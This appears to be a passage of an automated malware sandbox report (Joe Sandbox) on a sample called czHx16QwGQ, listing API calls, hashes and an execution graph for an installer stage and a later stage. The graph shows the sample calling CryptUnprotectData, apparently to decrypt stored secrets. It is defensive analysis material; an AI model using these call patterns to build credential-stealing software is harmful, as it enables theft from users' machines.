                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405E1E
                                                                                                                • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00405E2E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                • String ID: 0_B
                                                                                                                • API String ID: 3248276644-2128305573
                                                                                                                • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                Strings
                                                                                                                • Error launching installer, xrefs: 004059E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: Error launching installer
                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403A1A,75573420,00403819,00000006,?,00000006,?,0000000A), ref: 00403A5D
                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403A64
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 1100898210-4083868402
                                                                                                                • Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                • Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
                                                                                                                • Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
                                                                                                                • Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 7396116A
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 739611C7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 739611D9
                                                                                                                • GlobalFree.KERNEL32(?), ref: 73961203
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1780285237-0
                                                                                                                • Opcode ID: d9dbfd20df08c0910949617700bafc3a3cbd00618dcc498f153ac797ccaddcc2
                                                                                                                • Instruction ID: 0aef42c666cc22a61dbc603319dc77b09ba9d8214e781910fc98e77db988963c
                                                                                                                • Opcode Fuzzy Hash: d9dbfd20df08c0910949617700bafc3a3cbd00618dcc498f153ac797ccaddcc2
                                                                                                                • Instruction Fuzzy Hash: D33190B290B211EFE7009F76C945B36B7FCEB45354B15052EE84ADF254E738D8418BA2
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 190613189-0
                                                                                                                • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:12.2%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:2.2%
                                                                                                                Total number of Nodes:272
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 38101 39472020 SetTimer 38102 3947208c 38101->38102 38103 394720c0 38106 394720ed 38103->38106 38104 3947213c 38104->38104 38106->38104 38107 394717fc 38106->38107 38108 39471807 38107->38108 38114 394717d0 38108->38114 38110 3947229c 38118 38f4ec22 38110->38118 38122 38f495e8 38110->38122 38111 394722a5 38111->38104 38115 394717db 38114->38115 38126 3947181c GetCurrentThreadId 38115->38126 38117 394722f5 38117->38110 38119 38f4ec3a 38118->38119 38121 38f4ec47 38118->38121 38119->38121 38127 38f4e7f4 38119->38127 38121->38111 38124 38f495f3 38122->38124 38123 38f4ec47 38123->38111 38124->38123 38125 38f4e7f4 CreateWindowExW 38124->38125 38125->38123 38126->38117 38129 38f4e7ff 38127->38129 38128 38f4f111 38128->38121 38129->38128 38132 38f4fab0 38129->38132 38137 38f4faa1 38129->38137 38133 38f4fadb 38132->38133 38134 38f4fb8a 38133->38134 38142 394700b7 38133->38142 38146 394700c0 38133->38146 38138 38f4fadb 38137->38138 38139 38f4fb8a 38138->38139 38140 394700b7 CreateWindowExW 38138->38140 38141 394700c0 CreateWindowExW 38138->38141 38140->38139 38141->38139 38143 394700c3 38142->38143 38144 394700f5 38143->38144 38149 394701c8 38143->38149 38144->38134 38148 394701c8 CreateWindowExW 38146->38148 38147 394700f5 38147->38134 38148->38147 38150 394701d3 CreateWindowExW 38149->38150 38151 39470234 38150->38151 38151->38151 38152 ad030 38153 ad048 38152->38153 38154 ad0a2 38153->38154 38159 394702c1 38153->38159 38164 394702c8 38153->38164 38169 39471bd0 38153->38169 38176 39471bc0 38153->38176 38160 394702ee 38159->38160 38162 39471bc0 3 API calls 38160->38162 38163 39471bd0 3 API calls 38160->38163 38161 3947030f 38161->38154 38162->38161 38163->38161 38165 394702ee 38164->38165 38167 39471bc0 3 API calls 38165->38167 38168 39471bd0 3 API calls 38165->38168 38166 3947030f 38166->38154 38167->38166 38168->38166 38170 39471bfd 38169->38170 38171 39471c2f 38170->38171 38183 39471d50 38170->38183 38193 39479b48 38170->38193 38198 39471d58 38170->38198 38208 39479b40 38170->38208 38177 39471bfd 38176->38177 38178 39471c2f 38177->38178 38179 39471d50 3 API calls 38177->38179 38180 39479b40 2 API calls 38177->38180 38181 39471d58 3 API calls 38177->38181 38182 39479b48 2 API calls 38177->38182 38178->38178 38179->38178 38180->38178 38181->38178 38182->38178 38184 39471d66 38183->38184 38185 39471d93 38183->38185 38186 39471d6e 38184->38186 38213 39471dc0 38184->38213 38217 39471db9 38184->38217 38185->38184 38187 39471d98 38185->38187 38186->38171 38188 394717d0 GetCurrentThreadId 38187->38188 38189 39471da4 38188->38189 38189->38171 38190 39471dac 38190->38171 38195 39479b5c 38193->38195 38194 39479be8 38194->38171 38221 39479bf7 38195->38221 38224 39479c00 38195->38224 38199 39471d66 38198->38199 38200 39471d93 38198->38200 38205 39471d6e 38199->38205 38206 39471dc0 CallWindowProcW 38199->38206 38207 39471db9 CallWindowProcW 38199->38207 38200->38199 38201 39471d98 38200->38201 38202 394717d0 GetCurrentThreadId 38201->38202 38203 39471da4 38202->38203 38203->38171 38204 39471dac 38204->38171 38205->38171 38206->38204 38207->38204 38210 39479b5c 38208->38210 38209 39479be8 38209->38171 38211 39479bf7 2 API calls 38210->38211 38212 39479c00 2 API calls 38210->38212 38211->38209 38212->38209 38214 39471e02 38213->38214 38216 39471e09 38213->38216 38215 39471e5a CallWindowProcW 38214->38215 38214->38216 38215->38216 38216->38190 38218 39471e02 38217->38218 38220 39471e09 38217->38220 38219 39471e5a CallWindowProcW 38218->38219 38218->38220 38219->38220 38220->38190 38222 39479c11 38221->38222 38227 3947b047 38221->38227 38222->38194 38225 39479c11 38224->38225 38226 3947b047 2 API calls 38224->38226 38225->38194 38226->38225 38228 3947b053 38227->38228 38230 39471dc0 CallWindowProcW 38228->38230 38231 39471db9 CallWindowProcW 38228->38231 38229 3947b05a 38229->38222 38230->38229 38231->38229 38232 16b168 38233 16b174 38232->38233 38242 38360198 38233->38242 38246 38360188 38233->38246 38234 16b1a3 38250 38f4bd48 38234->38250 38243 383601a4 38242->38243 38266 3836c638 38243->38266 38244 383601da 38244->38234 38247 383601a4 38246->38247 38249 3836c638 CryptUnprotectData 38247->38249 38248 383601da 38248->38234 38249->38248 38251 38f4bd54 38250->38251 38290 38f4bda0 38251->38290 38254 39472730 38255 3947273f 38254->38255 38320 39470938 38255->38320 38260 39472729 38261 3947273f 38260->38261 38262 39470938 10 API calls 38261->38262 38263 39472746 38262->38263 38264 3947188c 14 API calls 38263->38264 38265 16b1b1 38264->38265 38268 3836c66a 38266->38268 38267 3836caf9 38267->38244 38268->38267 38270 3836cf1d 38268->38270 38271 3836cf2c 38270->38271 38274 3836d577 38271->38274 38275 3836d59b 38274->38275 38279 3836d7a0 38275->38279 38283 3836d798 38275->38283 38276 3836d629 38280 3836d7bd 38279->38280 38287 3836d1ec 38280->38287 38284 3836d7bd 38283->38284 38285 3836d1ec CryptUnprotectData 38284->38285 38286 3836d7f5 38285->38286 38286->38276 38288 3836d9e0 CryptUnprotectData 38287->38288 38289 3836d7f5 38288->38289 38289->38276 38291 38f4bdb4 38290->38291 38295 38f4ce60 38291->38295 38299 38f4ce50 38291->38299 38292 16b1aa 38292->38254 38292->38260 38296 38f4ce7c 38295->38296 38303 38f494b4 38296->38303 38298 38f4ce9b 38298->38292 38300 38f4ce7c 38299->38300 38301 38f494b4 CreateWindowExW 38300->38301 38302 38f4ce9b 38301->38302 38302->38292 38304 38f494bf 38303->38304 38305 38f4cf4f 38304->38305 38308 38f4cf68 38304->38308 38312 38f4cf39 38304->38312 38305->38298 38309 38f4cf7f 38308->38309 38310 38f4d021 38309->38310 38311 38f495e8 CreateWindowExW 38309->38311 38310->38310 38311->38310 38313 38f4cf3f 38312->38313 38314 38f4cf57 38312->38314 38317 38f4cf4f 38313->38317 38318 38f4cf68 CreateWindowExW 38313->38318 38319 38f4cf39 CreateWindowExW 38313->38319 38315 38f495e8 CreateWindowExW 38314->38315 38316 38f4d021 38314->38316 38315->38316 38317->38305 38318->38317 38319->38317 38321 39470948 38320->38321 38322 39470965 38321->38322 38329 39470980 38321->38329 38341 39470978 38321->38341 38325 3947188c 38322->38325 38327 39471897 38325->38327 38328 39472866 38327->38328 38363 39471934 38327->38363 38330 394709c6 GetCurrentProcess 38329->38330 38332 39470a11 38330->38332 38333 39470a18 GetCurrentThread 38330->38333 38332->38333 38334 39470a55 GetCurrentProcess 38333->38334 38335 39470a4e 38333->38335 38336 39470a8b 38334->38336 38335->38334 38353 39470b57 38336->38353 38357 39470f39 38336->38357 38337 39470ab3 GetCurrentThreadId 38338 39470ae4 38337->38338 38338->38322 38342 394709c6 GetCurrentProcess 38341->38342 38344 39470a11 38342->38344 38345 39470a18 GetCurrentThread 38342->38345 38344->38345 38346 39470a55 GetCurrentProcess 38345->38346 38347 39470a4e 38345->38347 38348 39470a8b 38346->38348 38347->38346 38351 39470b57 2 API calls 38348->38351 38352 39470f39 38348->38352 38349 39470ab3 GetCurrentThreadId 38350 39470ae4 38349->38350 38350->38322 38351->38349 38352->38349 38359 39470bc0 DuplicateHandle 38353->38359 38361 39470bc8 DuplicateHandle 38353->38361 38354 39470b8e 38354->38337 38358 39470f4e 38357->38358 38358->38337 38360 39470c5e 38359->38360 38360->38354 38362 39470c5e 38361->38362 38362->38354 38369 3947193f 38363->38369 38364 39472e79 38365 39472ea9 38364->38365 38366 39472ac4 11 API calls 38364->38366 38370 39472ed4 38365->38370 38385 39472ac4 38365->38385 38366->38365 38368 39472ec1 38368->38370 38391 3947d608 38368->38391 38398 3947d5f8 38368->38398 38369->38364 38369->38370 38375 39473e17 38369->38375 38380 39473e40 38369->38380 38370->38327 38377 39473e61 38375->38377 38376 39473e85 38376->38364 38377->38376 38405 39473fe7 38377->38405 38411 39473ff0 38377->38411 38381 39473e61 38380->38381 38382 39473e85 38381->38382 38383 39473fe7 11 API calls 38381->38383 38384 39473ff0 11 API calls 38381->38384 38382->38364 38383->38382 38384->38382 38386 39472acf 38385->38386 38387 39470938 10 API calls 38386->38387 38390 3947d0a1 38386->38390 38388 3947d0bb 38387->38388 38437 3947c544 38388->38437 38390->38368 38397 3947d66d 38391->38397 38392 3947d899 38393 39470938 10 API calls 38392->38393 38395 3947d6ba 38393->38395 38394 3947c5c0 LdrInitializeThunk 38394->38397 38395->38370 38397->38392 38397->38394 38397->38395 38445 3947c60c 38397->38445 38404 3947d66d 38398->38404 38399 3947c5c0 LdrInitializeThunk 38399->38404 38400 3947d899 38401 39470938 10 API calls 38400->38401 38402 3947d6ba 38401->38402 38402->38370 38403 3947c60c DispatchMessageW 38403->38404 38404->38399 38404->38400 38404->38402 38404->38403 38406 39473ffd 38405->38406 38407 39470938 10 API calls 38406->38407 38408 3947402b 38407->38408 38409 39474036 38408->38409 38417 39472bec 38408->38417 38409->38376 38416 39473ffd 38411->38416 38412 39470938 10 API calls 38413 3947402b 38412->38413 38414 39474036 38413->38414 38415 39472bec 11 API calls 38413->38415 38414->38376 38415->38414 38416->38412 38418 39472bf7 38417->38418 38420 394740a8 38418->38420 38421 39472c20 38418->38421 38420->38420 38422 39472c2b 38421->38422 38427 39472c30 38422->38427 38424 39474517 38431 39479221 38424->38431 38428 39472c3b 38427->38428 38429 394757a0 38428->38429 38430 39473e40 11 API calls 38428->38430 38429->38424 38430->38429 38432 39474551 38431->38432 38433 39479235 38431->38433 38432->38420 38435 38f4fab0 CreateWindowExW 38433->38435 38436 38f4faa1 CreateWindowExW 38433->38436 38434 39479321 38435->38434 38436->38434 38438 3947c54f 38437->38438 38439 3947d3bb 38438->38439 38441 3947c560 38438->38441 38439->38390 38442 3947d3f0 OleInitialize 38441->38442 38444 3947d454 38442->38444 38444->38439 38446 3947e6d0 DispatchMessageW 38445->38446 38447 3947e73c 38446->38447 38447->38397
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 3836DA45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: 0f7a32a44c60d2be2de340e62e747b709ce7b0c28f414594f575a4232aeb0fa5
                                                                                                                • Instruction ID: 4b8b1f31ea32f2944b420b695b6332d42d54d3aea07275585dcb1d7b462aa26e
                                                                                                                • Opcode Fuzzy Hash: 0f7a32a44c60d2be2de340e62e747b709ce7b0c28f414594f575a4232aeb0fa5
                                                                                                                • Instruction Fuzzy Hash: 6C1137B68002499FDB10CFA9C845BEEBFF5EF88320F148419E954A7210C379A551DFA5
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 3836DA45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: d32919c7dac28b111fefc8d2e48216eceb91d1a16b044899479e6839e2b8802d
                                                                                                                • Instruction ID: 5b9eda545fcea417430a9dc93d162b0d48915d69314206a95647f6fe55db3a4a
                                                                                                                • Opcode Fuzzy Hash: d32919c7dac28b111fefc8d2e48216eceb91d1a16b044899479e6839e2b8802d
                                                                                                                • Instruction Fuzzy Hash: CC1114768043499FDB10CF9AC845BEEBBF4EF88320F148419E658A7250C779A950DFA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5
                                                                                                                • API String ID: 0-1319679454
                                                                                                                • Opcode ID: 14f60693f3c67bbf05a1d8068baed6b82ae114626b9c23f01fd387df84728c43
                                                                                                                • Instruction ID: 110873692401e2709b9d326bfc3f166c694bf840400c134750e33655f92451be
                                                                                                                • Opcode Fuzzy Hash: 14f60693f3c67bbf05a1d8068baed6b82ae114626b9c23f01fd387df84728c43
                                                                                                                • Instruction Fuzzy Hash: 9AA10374D002088FEB10DFA8C8947DDBBB1BF89314F20826AE448BB395DB755985CF55
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2746866555.0000000038360000.00000040.00000800.00020000.00000000.sdmp, Offset: 38360000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38360000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 5
                                                                                                                • API String ID: 0-1319679454
                                                                                                                • Opcode ID: 918355b3f7c560c366882ebd3d81ce5111678eee138bcf5541f84484268b08f9
                                                                                                                • Instruction ID: 74e21d48c2fbae3af194a92544df430a15cc1afce22f2b523a8fac9d217a380c
                                                                                                                • Opcode Fuzzy Hash: 918355b3f7c560c366882ebd3d81ce5111678eee138bcf5541f84484268b08f9
                                                                                                                • Instruction Fuzzy Hash: 60A1F174D002088FEB14DFA8C894BDDBBB1BF89314F208269E418BB395DB759985CF55
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^78
                                                                                                                • API String ID: 0-256392365
                                                                                                                • Opcode ID: ce0eca43cd54e051749e4492605949b4ebade96c07ff78f9108951a649b49485
                                                                                                                • Instruction ID: 37a5f21f5aedd867ed06e594403cb3aeeffcc3815820ac5527db1806dab20e36
                                                                                                                • Opcode Fuzzy Hash: ce0eca43cd54e051749e4492605949b4ebade96c07ff78f9108951a649b49485
                                                                                                                • Instruction Fuzzy Hash: A4A180B5E01228CFEB18CF6AC945B9DBBF2AF89300F14C5AAD408B7255DB345A85CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^78
                                                                                                                • API String ID: 0-256392365
                                                                                                                • Opcode ID: bf50d21b6f0c4f6b32786fb8ee5ce05ebafff76b807cdc0890eb15008cd86677
                                                                                                                • Instruction ID: c0be668628d665d9aae16784a52d4aca763aae98e0ea3e55805b6462322e727c
                                                                                                                • Opcode Fuzzy Hash: bf50d21b6f0c4f6b32786fb8ee5ce05ebafff76b807cdc0890eb15008cd86677
                                                                                                                • Instruction Fuzzy Hash: 9EA191B5E01218CFEB18CF6AC944B9DBBF2AF89300F14C5AAD40CA7255DB345A85CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^78
                                                                                                                • API String ID: 0-256392365
                                                                                                                • Opcode ID: 4ba0e4991231e2234cf9510160b80f2985f64fff6d2392e2255abb01c6c444c2
                                                                                                                • Instruction ID: 7aedbe63bf3dcf094b7a0b20edefcda8d3e192c4760fccc0860299bb1d4b5116
                                                                                                                • Opcode Fuzzy Hash: 4ba0e4991231e2234cf9510160b80f2985f64fff6d2392e2255abb01c6c444c2
                                                                                                                • Instruction Fuzzy Hash: 12A192B5E01228CFEB58CF6AC945B9DBBF2AF89300F14C5AAD408B7255DB345A85CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^78
                                                                                                                • API String ID: 0-256392365
                                                                                                                • Opcode ID: 1d890d9ac1e3683d2bfac182d22decd996c0b0a1840e6d972c416e289a746c7d
                                                                                                                • Instruction ID: f2a7e7d20b6f3b42a286a0dbbc243d2bdd8b6325e790d3fcb12ffe73cf07b6df
                                                                                                                • Opcode Fuzzy Hash: 1d890d9ac1e3683d2bfac182d22decd996c0b0a1840e6d972c416e289a746c7d
                                                                                                                • Instruction Fuzzy Hash: FDA1A2B5E05218CFEB14CF6AC944B9DBBF2AF89300F14C5AAD408A7265DB345A85CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0^78
                                                                                                                • API String ID: 0-256392365
                                                                                                                • Opcode ID: fef05c945dc0e91721f2693e51502063b38c4fc3168e2bc86297d86f995ba8ac
                                                                                                                • Instruction ID: 32c381ddc9045f3a785b3fc4bda0eeafb787aa92acdbed2808bf468d56b315fb
                                                                                                                • Opcode Fuzzy Hash: fef05c945dc0e91721f2693e51502063b38c4fc3168e2bc86297d86f995ba8ac
                                                                                                                • Instruction Fuzzy Hash: 9E71A4B5E016188FEB58CF66C945B9DBBF2AF89200F14C5AAD40DA7255DB344A86CF10
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2747378559.0000000038F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38f40000_czHx16QwGQ.jbxd
